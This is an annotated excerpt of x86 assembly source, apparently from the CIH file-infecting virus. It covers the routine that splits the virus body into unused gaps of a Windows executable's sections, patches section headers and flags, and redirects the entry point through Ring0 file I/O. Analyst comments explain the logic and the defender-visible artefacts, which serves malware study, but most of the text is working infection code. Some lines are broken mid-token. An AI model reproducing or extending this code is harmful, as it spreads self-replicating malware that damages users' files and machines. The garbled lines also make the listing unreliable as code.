📄 cih14.txt
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx
push ecx
xchg ecx, eax
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeS
tion
jl OnlySetInfectedMark
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg eax, ebp
push 00000004h
pop ecx
push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[e
]
add edx, 12h
call edi
cmp dword ptr [esi], 'piZn'
je NotSetInfectedMark
pop edx
pop ebx
pop edi
pop ecx
push edi
add edx, ebp
push edx
add ebp, esi
push ebp
lea eax, [ebp+edi-04h]
mov [eax], ebx
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer
mov (NewAddressOfEntryPoint-@9)[esi], edx
lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections
; ---------------------------------------------------------------------
; Analyst note: per-section loop of the file-infection routine.
; For each section-table entry it measures the unused tail of the
; section's raw data (SizeOfRawData - VirtualSize). When that gap is
; non-empty it pushes one (size, file offset, buffer address) triple and
; records an 8-byte {size, in-memory address} entry in a table that
; grows downward through eax. It then raises the header's VirtualSize by
; the gap and ORs 40000040h into Characteristics.
; Registers as used here:
;   edx = current section-table entry   edi = source buffer cursor
;   ebp = bytes of the body not yet placed (starts at offset VirusSize)
;   eax = cursor of the {size, address} table
;   ecx = loop counter (presumably the NumberOfSections+1 value pushed
;         earlier in the listing - confirm against the pops before the loop)
;   esi = base register for the (Field-@9) header offsets; label @9 is
;         defined outside this excerpt.
; Defender's view: the code is placed inside existing gaps, so file
; length is presumably unchanged. The visible artefacts are section
; headers whose VirtualSize was raised to SizeOfRawData, read/initialized
; -data flags forced on, and an entry point redirected into such a gap
; (see the NewAddressOfEntryPoint store before the loop).
; ---------------------------------------------------------------------
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable ; step to the next section-table entry
mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx] ; ebx = SizeOfRawData - VirtualSize (unused tail)
jbe EndOfWriteCodeToSections ; unsigned: no gap (raw <= virtual), skip this section
push ebx ; Size of this chunk
sub eax, 08h ; reserve the next 8-byte table entry (table grows downward)
mov [eax], ebx ; entry.size = gap size
mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx] ; file offset where the gap starts
push ebx ; Pointer of File for this chunk
push edi ; Address of Buffer for this chunk
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi] ; address of the gap once the image is loaded
mov [eax+4], ebx ; entry.address = that address
mov ebx, [eax] ; reload the gap size
add (VirtualSize-@9)[edx], ebx ; header now claims the gap as section content
or (Characteristics-@9)[edx], 40000040h ; PE flags IMAGE_SCN_MEM_READ | IMAGE_SCN_CNT_INITIALIZED_DATA
StartToWriteCodeToSections: ; first iteration enters here via the jmp above the loop
sub ebp, ebx ; remaining -= size of the chunk just queued
jbe SetVirusCodeSectionTableEndMark ; nothing left to place: finish the table
add edi, ebx ; Move Address of Buffer past the queued chunk
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections ; dec ecx; repeat while sections remain
; Analyst note: reached when the section loop runs out of entries, and
; from the earlier size comparison (jl OnlySetInfectedMark) when the
; available space is too small. Every write queued on the stack is
; discarded by replacing esp wholesale.
OnlySetInfectedMark:
mov esp, dr1 ; reload esp from debug register DR1. Where DR1 was loaded is outside this excerpt; presumably a stack pointer saved earlier (confirm). Debug-register access is privileged, consistent with the Ring0 file I/O call earlier in the listing.
jmp WriteVirusCodeToFile ; target is outside this excerpt
; Analyst note: bail-out path taken by the `je` that follows the
; comparison of the dword at [esi] with 'piZn' earlier in the listing.
; The file is left unmodified on this path.
NotSetInfectedMark:
add esp, 3ch ; drop 3Ch (60) bytes, i.e. fifteen dwords of queued values, from the stack
jmp CloseFile ; target is outside this excerpt
SetVirusCodeSectionTableEndMark:
; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp
; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx